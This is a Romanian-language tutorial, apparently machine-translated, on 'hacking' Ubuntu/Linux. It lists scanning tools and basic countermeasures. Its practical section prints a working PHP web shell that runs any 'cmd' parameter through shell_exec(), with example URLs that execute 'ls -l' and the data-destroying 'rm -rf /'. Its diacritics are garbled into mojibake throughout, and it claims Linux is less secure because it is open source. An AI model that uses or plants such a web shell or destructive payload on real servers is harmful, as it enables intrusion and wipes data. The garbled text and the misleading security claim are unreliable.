Hacking Linux OS: Hacking cu Ubuntu (Tutorial de comenzi)
Linux este cel mai utilizat sistem de operare pentru servere, รฎn special pentru serverele web. Este open source; aceasta รฎnseamnฤ cฤ oricine poate avea acces la codul sursฤ. Acest lucru รฎl face mai puศin sigur รฎn comparaศie cu alte sisteme de operare, deoarece atacatorii pot studia codul sursฤ pentru a gฤsi vulnerabilitฤศi. Linux for Hackers se referฤ la exploatarea acestor vulnerabilitฤศi pentru a obศine acces neautorizat la un sistem.
รn acest articol, vฤ vom prezenta ce este Linux, vulnerabilitฤศile sale de securitate, cu care piratare Ubuntu ศi contramฤsurile pe care le poศi pune รฎn aplicare.
Notฤ rapidฤ pe Linux
Linux este un sistem de operare open source. Existฤ multe distribuศii de sisteme de operare bazate pe Linux, cum ar fi Redhat, Fedora ศi Ubuntu, etc. Spre deosebire de alte sisteme de operare, Linux este mai puศin sigur cรขnd vine vorba de securitate. Acest lucru se datoreazฤ faptului cฤ codul sursฤ este disponibil gratuit, deci este uศor sฤ รฎl studiezi pentru vulnerabilitฤศi ศi sฤ le exploatezi รฎn comparaศie cu alte sisteme de operare care nu sunt open source. Linux poate fi folosit ca sistem de operare server, desktop, tabletฤ sau dispozitiv mobil.
Programele Linux pot fi operate fie folosind GUI, fie comenzi. Comenzile Linux pentru Kali Linux hacking-urile sunt mai eficiente ศi mai eficiente รฎn comparaศie cu utilizarea GUI. Din acest motiv, vฤ ajutฤ sฤ cunoaศteศi comenzile Linux de bazฤ pentru hacking.
Consultaศi aceste tutoriale https://www.guru99.com/unix-linux-tutorial.html despre cum sฤ รฎncepeศi Kali Linux hack-uri.
Instrumente de hacking Linux
- Nessusโ acest instrument poate fi folosit pentru Ubuntu hack, setฤri de configurare de scanare, patch-uri ศi reศele etc. poate fi gฤsit la https://www.tenable.com/products/nessus
- NMap. Acest instrument poate fi folosit pentru a monitoriza gazdele care ruleazฤ pe server ศi serviciile pe care le utilizeazฤ. Poate fi folosit ศi pentru a scana porturi. Poate fi gฤsit la https://nmap.org/
- SARA โ SARA este acronimul pentru Security Auditor's Research Assistant. Dupฤ cum sugereazฤ ศi numele, acest instrument poate fi utilizat pentru a audita reศelele รฎmpotriva ameninศฤrilor precum Injecศie SQL, XSS etc. poate fi gฤsit la http://www-arc.com/sara/sara.html
Lista de mai sus nu este exhaustivฤ; vฤ oferฤ o idee despre instrumentele disponibile pentru Ubuntu piratarea ศi piratarea sistemelor Linux.
Cum sฤ preveniศi hackurile Linux
Linux Hacking profitฤ de vulnerabilitฤศile din sistemul de operare. O organizaศie poate adopta urmฤtoarea politicฤ pentru a se proteja รฎmpotriva unor astfel de atacuri.
- Managementul patch-urilorโ corecศiile remediazฤ erorile pe care atacatorii le exploateazฤ pentru a compromite un sistem. O bunฤ politicฤ de gestionare a corecศiilor vฤ va asigura cฤ aplicaศi รฎn mod constant corecศiile relevante sistemului dumneavoastrฤ.
- Configurare corectฤ a sistemului de operareโ alte exploit-uri profitฤ de punctele slabe din configuraศia serverului. Numele de utilizator ศi demonii inactivi ar trebui sฤ fie dezactivate. Setฤrile implicite, cum ar fi parolele comune pentru aplicaศie, numele de utilizator implicite ศi unele numere de porturi ar trebui modificate.
- Sistem de detectare a intruziunilorโ astfel de instrumente pot fi folosite pentru a detecta accesul neautorizat la sistem. Unele instrumente au capacitatea de a detecta ศi de a preveni astfel de atacuri.
Activitate de hacking: Hack a Ubuntu Sistem Linux folosind PHP
รn acest scenariu practic, vom รฎnvฤศa cum sฤ piratam Ubuntu ศi vฤ vom oferi informaศii de bazฤ despre cum puteศi utiliza PHP pentru a compromite un Linux. Nu vom viza nicio victimฤ. Dacฤ doriศi sฤ รฎl รฎncercaศi, puteศi instala LAMPP pe maศina dvs. localฤ.
PHP vine cu douฤ funcศii care pot fi folosite pentru a executa comenzi de hacking Linux. Are funcศiile exec() ศi shell_exec(). Funcศia exec() returneazฤ ultima linie a comenzii, รฎn timp ce shell_exec() returneazฤ รฎntregul rezultat al comenzii ca ศir.
รn scopuri demonstrative, sฤ presupunem cฤ managerii atacatorilor รฎncarcฤ urmฤtorul fiศier pe un server web.
<?php $cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l'; echo "executing shell command:-> $cmd</br>"; $output = shell_exec($cmd); echo "<pre>$output</pre>"; ?>
AICI,
Scriptul de mai sus primeศte comanda de la variabila GET numitฤ cmd. Comanda este executatฤ folosind shell_exec() ศi rezultatele sunt returnate รฎn browser.
Codul de mai sus poate fi exploatat folosind urmฤtoarele URL
http://localhost/cp/konsole.php?cmd=ls%20-l
AICI,
- โโฆkonsole.php?cmd=ls%20-lโatribuie valoarea ls โl variabilei cmd.
Comanda รฎn Ubuntu pentru hacking รฎmpotriva serverului va fi executat ca
shell_exec('ls -l') ;
Executarea codului de mai sus pe un server web dฤ rezultate similare cu urmฤtoarele.
Comanda de mai sus afiศeazฤ pur ศi simplu fiศierele din directorul curent ศi permisiunile
Sฤ presupunem cฤ atacatorul trece urmฤtoarea comandฤ
rm -rf /
AICI,
- โrmโ eliminฤ fiศierele
- โrfโ face ca comanda rm sฤ ruleze รฎntr-un mod recursiv. ศtergerea tuturor folderelor ศi fiศierelor
- โ/โ indicฤ comenzii sฤ รฎnceapฤ ศtergerea fiศierelor din directorul rฤdฤcinฤ
Atacul URL ar arฤta cam aศa
http://localhost/cp/konsole.php?cmd=rm%20-rf%20/
Rezumat
- Linux este un sistem de operare popular pentru servere, desktop-uri, tablete ศi dispozitive mobile.
- Linux este open source, iar codul sursฤ poate fi obศinut de oricine. Acest lucru faciliteazฤ identificarea vulnerabilitฤศilor. Este unul dintre cele mai bune sisteme de operare pentru hackeri.
- Comenzi de hacking de bazฤ ศi de reศea รฎn Ubuntu sunt valoroase pentru hackerii Linux.
- Vulnerabilitฤศile sunt o slฤbiciune care poate fi exploatatฤ pentru a compromite un sistem.
- O bunฤ securitate poate ajuta la protejarea unui sistem de a fi compromis de un atacator.

